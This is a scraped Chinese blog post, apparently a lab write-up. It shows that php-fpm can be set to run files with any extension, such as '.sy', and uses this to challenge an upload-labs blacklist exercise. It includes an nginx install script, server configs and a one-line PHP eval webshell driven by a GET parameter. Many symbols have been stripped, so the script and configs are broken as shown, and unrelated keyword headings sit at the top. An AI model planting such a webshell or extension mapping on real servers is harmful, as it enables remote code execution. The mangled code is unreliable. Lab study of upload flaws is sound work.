广西南宁建设厅网站首页,服务器绑定网站打不开,app网站建设可行性分析,wordpress编辑器文件大小php任何后缀名解析 背景#xff1a;为了验证php解析不依靠后缀名#xff0c;可以是任何后缀名#xff0c;纠正upload-labs Pass-03#xff08;黑名单验证#xff0c;特殊后缀#xff09;里所说的几个固定的后缀名理论是错误的。1 部署1.1 环境准备1.1.1 系统、内核#… php任何后缀名解析 背景为了验证php解析不依靠后缀名可以是任何后缀名纠正upload-labs Pass-03黑名单验证特殊后缀里所说的几个固定的后缀名理论是错误的。1 部署1.1 环境准备1.1.1 系统、内核可以是任何系统1.1.2 应用 1.2 部署1.2.1 php部署连接如下1.2.2 nginx部署脚本如下1.2.3 upload-labs部署 2 验证php-fpm配置的后缀名是否生效 背景为了验证php解析不依靠后缀名可以是任何后缀名纠正upload-labs Pass-03黑名单验证特殊后缀里所说的几个固定的后缀名理论是错误的。
1 部署
1.1 环境准备
1.1.1 系统、内核可以是任何系统 /etc/os-release
NAMEFedora Linux
VERSION38 (Server Edition)
IDfedora
VERSION_ID38
...
uname -a
Linux localhost.localdomain 6.6.7-100.fc38.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 13 21:41:36 UTC 2023 x86_64 GNU/Linux1.1.2 应用
php7.2 可以是任意版本php此次采用7.2是为了验证PHP远程代码执行漏洞复现CVE-2019-11043结果没成功原因是前端web应用我部署的是nginx案例里docker容器里是Apachephp7.2 相关连接CVE-2019-11043
nginx (可以是任何版本nginx,预编译取消nginx用户是想验证默认编译好的user是否是nobody)
1.2 部署
1.2.1 php部署连接如下
编译安装 PHP 7.2.10
额外修改php-fpm内容如下 security.limit_extensions .php5 .phps .sy .php 加到配置最后即可然后需要重启php-fpm 1.2.2 nginx部署脚本如下
#!/bin/bash
#
#********************************************************************
#Author: Mr.Song
#QQ: 1132197391
#Date: 2020-12-01
#FileName install_nginx.sh
#Description The test script
#Copyright (C): 2021 All rights reserved
#********************************************************************
SRC_DIR/usr/local/src
NGINX_URLhttp://nginx.org/download/
NGINX_FILEnginx-1.25.1
#NGINX_FILEnginx-1.18.0
TAR.tar.gz
NGINX_INSTALL_DIR/apps/nginx
CPUSlscpu |awk /^CPU\(s\)/{print $2}
. /etc/os-releasecolor () {RES_COL60MOVE_TO_COLecho -en \\033[${RES_COL}GSETCOLOR_SUCCESSecho -en \\033[1;32mSETCOLOR_FAILUREecho -en \\033[1;31mSETCOLOR_WARNINGecho -en \\033[1;33mSETCOLOR_NORMALecho -en \E[0mecho -n $1 $MOVE_TO_COLecho -n [if [ $2 success -o $2 0 ] ;then${SETCOLOR_SUCCESS}echo -n $ OK elif [ $2 failure -o $2 1 ] ;then${SETCOLOR_FAILURE}echo -n $FAILEDelse${SETCOLOR_WARNING}echo -n $WARNINGfi${SETCOLOR_NORMAL}echo -n ]echo
}os_type () {awk -F[ ] /^NAME/{print $2} /etc/os-release
}os_version () {awk -F /^VERSION_ID/{print $2} /etc/os-release
}check () {[ -e ${NGINX_INSTALL_DIR} ] { color nginx 已安装,请卸载后再安装 1; exit; }cd ${SRC_DIR}if [ -e ${NGINX_FILE}${TAR} ];thencolor 相关文件已准备好 0elsecolor 开始下载 nginx 源码包 0wget ${NGINX_URL}${NGINX_FILE}${TAR}[ $? -ne 0 ] { color 下载 ${NGINX_FILE}${TAR}文件失败 1; exit; }fi
}install () {color 开始安装 nginx 0if id nginx /dev/null;thencolor nginx 用户已存在 1else#useradd -s /sbin/nologin -r nginxcolor 创建 nginx 用户 0ficolor 开始安装 nginx 依赖包 0if [ $ID centos ] ;thenif [[ $VERSION_ID ~ ^7 ]];thenyum -y -q install make gcc pcre-devel openssl-devel zlib-devel perl-ExtUtils-Embedelif [[ $VERSION_ID ~ ^8 ]];thenyum -y -q install make gcc-c libtool pcre pcre-devel zlib zlib-devel openssl openssl-devel perl-ExtUtils-Embedelsecolor 不支持此系统! 1exitfielif [ $ID rocky ];thenyum -y -q install make gcc-c libtool pcre pcre-devel zlib zlib-devel openssl openssl-devel perl-ExtUtils-Embedelseapt update /dev/nullapt -y install make gcc libpcre3 libpcre3-dev openssl libssl-dev zlib1g-dev /dev/nullficd $SRC_DIRtar xf ${NGINX_FILE}${TAR}NGINX_DIRecho ${NGINX_FILE}${TAR}| sed -nr s/^(.*[0-9]).*/\1/pcd ${NGINX_DIR}#./configure --prefix${NGINX_INSTALL_DIR} --usernginx --groupnginx --with-http_ssl_module --with-http_v2_module --with-http_realip_module --with-http_stub_status_module --with-http_gzip_static_module --with-pcre --with-stream --with-stream_ssl_module --with-stream_realip_module./configure --prefix${NGINX_INSTALL_DIR} --with-http_ssl_module --with-http_v2_module --with-http_realip_module --with-http_stub_status_module --with-http_gzip_static_module --with-pcre --with-stream --with-stream_ssl_module --with-stream_realip_modulemake -j $CPUS make install[ $? -eq 0 ] color nginx 编译安装成功 0 || { color nginx 编译安装失败,退出! 1 ;exit; }echo PATH${NGINX_INSTALL_DIR}/sbin:${PATH} /etc/profile.d/nginx.shcat /lib/systemd/system/nginx.service EOF
[Unit]
DescriptionThe nginx HTTP and reverse proxy server
Afternetwork.target remote-fs.target nss-lookup.target[Service]
Typeforking
PIDFile${NGINX_INSTALL_DIR}/logs/nginx.pid
ExecStartPre/bin/rm -f ${NGINX_INSTALL_DIR}/logs/nginx.pid
ExecStartPre${NGINX_INSTALL_DIR}/sbin/nginx -t
ExecStart${NGINX_INSTALL_DIR}/sbin/nginx
ExecReload/bin/kill -s HUP \$MAINPID
KillSignalSIGQUIT
TimeoutStopSec5
KillModeprocess
PrivateTmptrue
LimitNOFILE100000[Install]
WantedBymulti-user.target
EOFsystemctl daemon-reloadsystemctl enable --now nginx /dev/nullsystemctl is-active nginx /dev/null || { color nginx 启动失败,退出! 1 ; exit; }color nginx 安装完成 0
}check
install配置如下
location / {root html;index index.html index.php;#index index.html index.php index.pht index.phps index.php5;try_files $uri $uri/ 404;}location ~ (.php|.php5|.phps|.sy)$ {#location ~ [^/]\.php(/|$) {fastcgi_split_path_info ^(.?\.php)(/.*)$;include fastcgi_params;fastcgi_param PATH_INFO $fastcgi_path_info;fastcgi_index index.php;fastcgi_param REDIRECT_STATUS 200;fastcgi_param SCRIPT_FILENAME /apps/nginx/html$fastcgi_script_name;fastcgi_param DOCUMENT_ROOT /apps/nginx/html;fastcgi_pass localhost:9000;}1.2.3 upload-labs部署
upload-labs源码
解压放入 nginx的html目录下即可
2 验证php-fpm配置的后缀名是否生效
get方法一句话木马如下
?php eval($_GET[sy]); 以上.sy结尾就是我在php-fpm所配置的.sy结尾的后缀名文件 需要注意的是前端代理nginx 路由需要标注后缀名否则会出现403如下
未配置路由日志
正常日志
如果nginx路由配置了后端php-fpm未配置就解析不了直接下载到本地了
